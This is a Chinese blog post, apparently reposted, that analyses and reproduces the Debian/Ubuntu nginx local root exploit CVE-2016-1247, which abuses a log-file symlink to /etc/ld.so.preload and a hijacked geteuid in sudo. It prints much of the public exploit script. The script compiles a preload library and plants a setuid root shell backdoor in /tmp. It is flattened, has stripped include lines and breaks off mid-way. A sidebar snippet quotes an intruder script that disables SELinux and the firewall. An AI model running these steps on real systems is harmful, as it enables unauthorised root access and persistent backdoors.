linux nginx 漏洞利用,Debian、Ubuntu发行版的Nginx本地提权漏洞本地复现及分析 | CN-SEC 中文网...

最新推荐文章于 2024-07-12 02:55:09 发布
最新推荐文章于 2024-07-12 02:55:09 发布
阅读量805 收藏 1
点赞数
文章标签: linux nginx 漏洞利用

摘要

3.Linux系统下的文件除了rwx之外还有一种重要的权限,即s。linux系统中每个进程都有2个ID,分别为用户ID(uid)和有效用户ID(euid),UID一般表示进程的创建者(属于哪个用户创建),而EUID表示进程对于文件和资源的访问权限(具备等同于哪个用户的权限)。即真实的进程权限是有EUID标注的而非UID。当一个可执行文件的权限设置了set-user-ID位,那么它在执行时,进程的euid就是程序文件所属用户的ID!最直接的例子,就是sudo这个程序的文件权限:

0x00.前言

继tomcat本地提权之后,最近又爆出了nginx deb包的本地提权漏洞,在本地测试分析之后,我发现其实这两个漏洞的触发点都是在同一处,利用方式也大同小异。相比deb包版的tomcat提权漏洞,这个漏洞的可用性更高一点,因为大多情况下tomcat的那个漏洞需要root管理员的交互操作(我想大多数时候没有自动定时重启tomcat的),但是如果nginx在/etc/logrotate.d/nginx已经设置了'daily'日志自动回滚的条件下,是不需要管理员交互就可以拿到root的。当我们通过web服务拿到一个web权限的时候,那么这个漏洞可用性还是很高的。

0x01.分析

这个漏洞的关键点是nginx日志目录下的error.log删除后将会root权限创建的,当nginx重新启动完成后,这个日志的文件用户拥有者又会回到www-data,意思这个过程中会有一次权限变化的过程,而且会首先用到root的权限,那么在这个过程中我们就可以从这短暂的root权限出发,想办法获得root从而达到提权的目的。这其实就跟tomcat的catalina.out文件一样 。具体怎么实现呢?从已经爆出的exp可以看出大致的利用过程,首先我们需要了解以下几点:

1.liunx使用touch创建文件,存在文件存在、不存在、存在为符号链接等等的情况,当文件为符号链接时会默认地对链接的文件进行操作。

2.Linux系统都支持应用程序在运行时进行动态链接库函数,以提供强大的扩展能力,所以Linux提供了一种可以在运行时重载/覆盖调用默认函数的环境变量,即LD_PRELOAD,LD_PRELOAD可以影响程序运行时的链接,它允许你定义在程序运行前优先加载动态链接库。这个功能主要用来有选择性的载入不同动态链接库中相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。而在liunx下/etc/ld.so.cache可以控制动态库的查找方式,但事实上我们也没必要那么麻烦去修改这个文件,因为稍微修改错了可能系统整个就挂掉了,这里只是提一下。从exp我们可以看出还可以通过另一种方式来覆盖程序加载的动态库中的函数,即通过/etc/ld.so.preload文件,查了一些资料,Linux各个发行版中默认都不存在该文件,如果我们在/etc/ld.so.preload文件中加入一个so路径,那么elf程序在运行的时候都必然会去加载这个so并且优先使用里面的函数!但该文件由于处在/etc目录中,创建或者修改都需要root权限。

3.Linux系统下的文件除了rwx之外还有一种重要的权限,即s。linux系统中每个进程都有2个ID,分别为用户ID(uid)和有效用户ID(euid),UID一般表示进程的创建者(属于哪个用户创建),而EUID表示进程对于文件和资源的访问权限(具备等同于哪个用户的权限)。即真实的进程权限是有EUID标注的而非UID。当一个可执行文件的权限设置了set-user-ID位,那么它在执行时,进程的euid就是程序文件所属用户的ID!最直接的例子,就是sudo这个程序的文件权限:

bc3290df0ded320b78f1711fc5cdf9e8.png

所以当执行sudo程序的时候,我们可以以它所属用户的权限,即root(0)来操作系统。因此,一个最常见的提权思路,即为控制sudo的执行思路,绕过或者更改验证而直接执行代码。通过readelf查看sudo的引用的外部函数:

4a8776a59e2a0c3691f342ed98959779.png

可以看到,sudo的执行过程中会用到getuid或者setuid这种函数,结合LD_PRELOAD环境变量,由于sudo程序只要装载进内存中它的euid必然是root,那么在执行验证之前那么我们使用LD_PRELOAD来覆盖要加载的getuid函数,就可以绕过验证使用root权限来执行代码了。

在了解了以上几点之后,那么总结一下,当我们将error.log这个文件删除又建立一个到ld.so.preload文件的软连接,在nginx重启时将会以root权限创建日志文件的同时也会操作ld.so.preload文件,重启完成后ld.so.preload文件就会和error.log一样变成了www-data用户拥有,这时我们就可以任意操作ld.so.preload文件了。接着我们就能将我们用来覆盖getuid方法的编译好的so文件并将其写入ld.so.preload文件,最后在执行sudo的时候就会优先加载我们自定义的getuid方法,从而实现权限提升。

0x02.漏洞利用

环境版本:

0ad7eaa0581c118d9ee23d55fb94eb01.png

1.切换到www-data用户权限。首先删除error.log文件,并建一个指向ld.so.preload文件的软连接。

b8f58293042408ac3c19360da1dad46d.png

2.因为用apt-get默认安装的Nginx通过/etc/logrotate.d/nginx文件会每天定时回滚日志(如下图'daliy'),这里我们手动执行回滚,让它重新创建error日志文件,也就创建了ld.so.preload文件,当重启完成后并本地访问一次(为了让logrotation得到触发),这时ld.so.preload文件也变成了www-data用户拥有,那么我们就可以在里面写入重写后的getuid方法的so文件。

0f562cd08d3cab12b37649bf21c0e08a.png

当我们访问一次本地,让logrotation得到触发后,手动执行日志回滚。(实际过程中会在每天早上自动回滚,我们只需要等待)

d6bcd608141068b03e91c422e04027e7.png

82711c7e0daf3ff9ea1d817f50b0e408.png

可以看到ld.so.preload的用户已经是www-data,用户组是root

f4a05e211cb0011b12e3382d02c961f6.png

3.当ld.so.preload文件为www-data所有时,我们就可以在www-data用户权限下将重写过的getuid方法编译成so文件并写入ld.so.preload文件

309b36f8a0627e4c8b1c7452df7fccb9.png

将编译好的so文件路径写入ld.so.preload文件

aedcfedeac73a5e3f213f32f543a8a1f.png

创建后门并通过执行sudo让系统自动加载ld.so.preload中的我们重写的getuid方法。最终拿到root,效果如下:

57e4a7368c4d5f086ae59f14d3cf0677.png

完整exp(来自播报360)其实自己也很好编写的:

BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/nginxrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "/n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "/n[+] Job done. Exiting with code $1 /n" exit $1 } function ctrl_c() { echo -e "/n[+] Ctrl+C pressed" cleanexit 0 } #intro cat < ------------------------------- / / __---__ _- /--______ __--( / / )XXXXXXXXXXX/v. .-XXX( O O )XXXXXXXXXXXXXXX- /XXX( U ) XXXXXXX/ /XXXXX( )--_ XXXXXXXXXXX/ /XXXXX/ ( O ) XXXXXX /XXXXX/ XXXXX/ / XXXXXX /__ /XXXXX XXXXXX__/ XXXXXX /__----> ---___ XXX__/ XXXXXX /__ / /- --__/ ___// XXXXXX / ___--/= /-/ ___/ XXXXXX '--- XXXXXX /-//XXX/ XXXXXX /XXXXX /XXXXXXXXX / /XXXXX/ /XXXXXX > _/XXXXX/ /XXXXX--__/ __-- XXXX/ -XXXXXXXX--------------- XXXXXX- /XXXXXXXXXXXXXXXXXXXXXXXXXX/ ""VXXXXXXXXXXXXXXXXXXV"" _eascii_ echo -e "/033[94m /nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) /nnginxed-root.sh (ver. 1.0)/n" echo -e "Discovered and coded by: /n/nDawid Golunski /nhttps://legalhackers.com /033[0m" # Args if [ $# -lt 1 ]; then echo -e "/n[!] Exploit usage: /n/n$0 path_to_error.log /n" echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`/n" exit 3 fi # Priv check echo -e "/n[+] Starting the exploit as: /n/033[94m`id`/033[0m" id | grep -q www-data if [ $? -ne 0 ]; then echo -e "/n[!] You need to execute the exploit as www-data user! Exiting./n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "/n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again./n" exit 3 fi # [ Exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "/n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <$PRIVESCSRC #define _GNU_SOURCE #include #include <sys/stat.h> #include #include #include <sys/types.h> #include <sys/stat.h> #include uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "/n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "/n[+] Backdoor/low-priv shell installed at: /n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "/n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "/n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "/n[+] The server appears to be /033[94m(N)jinxed/033[0m (writable logdir) !

无机盐Alkali
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
12-4 Nginx漏洞复现分析
weixin_43263566的博客
11-29 1516
CGl: CGl是一种协议,用于定义Nginx或其他Web Server传递的数据格式。CGl是一个独立的程序,与Web Server无关,可以用任何语言编写CGl程序,比如C、Perl、Python等。Fastcgi: Fastcgi:是一种协议,前身是CGI,可以简单理解为是优化版的CGI,具有更高的稳定性和性能。PHP-CGI: 只是一个PHP的解释器,本身只能解析请求并返回结果,不会做进程管理。
linux 被攻击了,重装系统修改密码了也还是经常复发,咋整
qq_42622763的博客
08-24 680
#!/bin/bash SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin setenforce 0 2>/dev/null ulimit -n 65535 ufw disable iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT iptables -F echo "vm.nr_hugepages=$((1168+$(nproc)))" | t.
Debian Ubuntu Root权限受到威胁 Tomcat本地提权漏洞CVE-2016-1240 请安全运维尽快升级...
weixin_34238642的博客
09-01 317
2016年9月30日,legalhackers.com网站发布了一个关于Tomcat漏洞的公告,所涉及漏洞的编号为CVE-2016-1240。Debian系统的Linux上管理员通常利用apt-get进行包管理,debian包的一个初始化脚本中存在漏洞,会让deb包安装程序自动执行启动脚本,脚本位置/etc/init.d/tomcatN 攻击者可以在拥有...
UbuntuDebian系统的漏洞修复:apt安装包管理工具
最新发布
weixin_42099814的博客
07-12 32
在阿里云主机管理后台->安全云中心,会看到系统最新的公布漏洞。 对于系统软件漏洞,我们还是要早做修复,防患于未然。 但安全云中心的功能大部分需要付费,包括一键修复,自己修复软件漏洞怎么操作呢? 其实很简单,只需要链接ssh,然后用apt安装包管理工具进行软件升级。 1.更新本地的软件安装包文件 登录后复制 apt ...
ubuntu 最新提权漏洞_UbuntuDebian最新的KDE安全漏洞,附-修复指南
weixin_39568083的博客
11-25 283
Debian Project和Canonical为其支持的操作系统发布了安全更新,以解决KDE库中最近披露的一些漏洞。几周前,KDE社区修复了Dominik Penner在KDEfig组件中发现的安全漏洞,KConfig组件是KDE Plasma桌面环境的配置设置框架,可能允许攻击者通过包含的特制.desktop文件执行恶意代码在文件管理器中打开的存档中。“Dominik Penner发现KCon...
怎么用计算机算sec,计算机中的运算 | CN-SEC 中文网
weixin_39662142的博客
07-02 1056
摘要计算机只认识0和1,计算机能做的运算归根结底也就是直接对0和1做运算(通常称为 位运算)计算机只认识0和1,计算机能做的运算归根结底也就是直接对0和1做运算(通常称为 位运算)与运算两个位都为1时,结果为1 and(&)或运算只要有一个为1 就是1 or(|)异或运算不一样的时候是1 xor(^)非运算(单目运算)0变1 1变0 not(~)左移各二进制位全部左移若干位,高位丢弃,低位...
Linux系统提权思路
热门推荐
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的提权exp放出来,如果有的话,直接编译运行提权即可,简单粗暴。       如果没有相关内核的提权exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种提权思路,第一种就是内核e
nginx-1.19.3_nginx-http-flv-module.rar
09-01
标题中的"nginx-1.19.3_nginx-http-flv-module.rar"表明这是一个关于Nginx服务器的软件包,特别地,它包含了Nginx的1.19.3版本,并且已经集成了`nginx-http-flv-module`模块。这个模块是用于支持HTTP FLV(Flash ...
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 7662
Nginx解析漏洞该解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
Ubuntu20.04下Nginx的.NetCore项目部署流程
weixin_42088314的博客
04-07 4096
本文旨在介绍在Ubuntu20.04系统中配置Nginx服务,并进行.NetCore项目部署。 第一部分:.NetCore项目部署 参考文章:点此跳转 步骤一:安装.NET Core SDK 下面是Ubuntu20.04版本的.net环境配置,其它版本参考官方文档 1、打开终端并运行以下命令,将 Microsoft 包签名密钥添加到受信任密钥列表,并添加包存储库: wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microso
Nginx文件名逻辑漏洞(CVE-2013-4547)复现
君莫hacker的博客
09-20 2583
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 成功访问主页2. 上传php文件3. 上传gif文件4.修改后缀,增加截断5. 访问成功6. 上传木马文件7. 修改后缀8. 命令执行成功 0x01 漏洞介绍 漏洞描述 这个漏洞其实和代码执行没有太大的关系,主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。这是一个nginx解析漏洞漏洞编号 CVE-2013-4547 受影响版本 Nginx 0.8.41~1.4.3 Ng
linux 漏洞数量,Debian Linux被列为过去20年漏洞数量最多的操作系统
weixin_36247564的博客
05-15 335
1999 至 2019 年间,研究人员共发现了 Debian Linux 中的 3067 个安全漏洞。至于 Windows 平台,Server 2008 以 1421 个安全漏洞位列第一。Android 和 Linux 内核分别以 2563 和 2357 个漏洞排名第二和第三,macOS 以 2212 个漏洞排名第四。然而就 2019 年而言,Android 以 414 个漏洞位列第一。其次是 D...
Linux提权
weixin_44489066的博客
01-29 3407
系统漏洞提权总体思路:1、获取操作系统版本号;2、根据版本号搜索exp;3、反弹shell利用;4、尝试利用 1、获取系统版本号 获取发行版本 cat /etc/issue (Debianubuntu系列) cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release (红帽,centos系列) 获取内核版本 ca...
Android去年漏洞最多,20年来Debian漏洞最多
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
05-05 408
Python实战社群Java实战社群长按识别下方二维码,按需求添加扫码关注添加客服进Python社群▲扫码关注添加客服进Java社群▲作者丨白开水不加糖来自丨开源中国https://w...
linux本地提权漏洞,漏洞预警 | Ubuntu存在本地提权漏洞(附EXP及应对措施)
weixin_42566108的博客
05-16 420
今天下午,Twitter 用户 @Vitaly Nikolenko 发布消息,称 ubuntu 最新版本(Ubuntu 16.04)存在高危的本地提权漏洞,而且推文中还附上了 EXP 下载地址。Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux。此次发布的 EXP 即为 CVE-2017-16995 Linux 内核漏洞的攻击代码。该漏洞存在于L...
linux 提权-sudo提权
mingyqf的博客
10-26 2230
sudo -l 前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势。 简介 sodu 全称 Substitute User and Do,用来临时赋予root权限运行某个程序。 sodu 的执行原理: 普通用户执行命令时,首先检查/var/run/sudo/目录下是否有用户时间戳,centos检查/var/db/sudo/目录,并检查是否过期。如果时间戳过期,就需要输入当前用户的密码。输入后检查/etc/sudoers配置文件,查看用.
Nginx中间件漏洞
记录并分享学习安全的知识点..
04-09 665
Nginx中间件漏洞
registry-vpc.cn-beijing.aliyuncs.com/base/nginx-ingress-controller:0.30.0
09-06
registry-vpc.cn-beijing.aliyuncs.com/base/nginx-ingress-controller:0.30.0是一个容器镜像的名称与标签版本。该容器镜像用于部署和管理Nginx Ingress Controller的应用程序,通常在云原生环境中使用。 Nginx Ingress Controller是一个负责处理Ingress资源的控制器,它运行在Kubernetes集群中,并负责将外部请求路由到集群中的相应服务。通过使用Nginx Ingress Controller,我们可以在Kubernetes上实现负载均衡、SSL终止、路径匹配、流量转发等功能。 registry-vpc.cn-beijing.aliyuncs.com是阿里云的容器镜像仓库地址,base表示基础镜像名称,nginx-ingress-controller表示应用程序名称,0.30.0表示此镜像的版本号。 使用该镜像进行部署时,我们可以通过阿里云容器服务或其他容器管理工具来引用该镜像,并在Kubernetes集群中创建一个Pod或Deployment来运行Nginx Ingress Controller应用程序。此应用程序将根据提供的Ingress资源配置和规则来处理外部请求,并将其转发到后端服务。 通过使用registry-vpc.cn-beijing.aliyuncs.com/base/nginx-ingress-controller:0.30.0镜像,我们可以获取到指定版本的Nginx Ingress Controller应用程序,并可以利用其功能来实现高可用的负载均衡和路由管理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值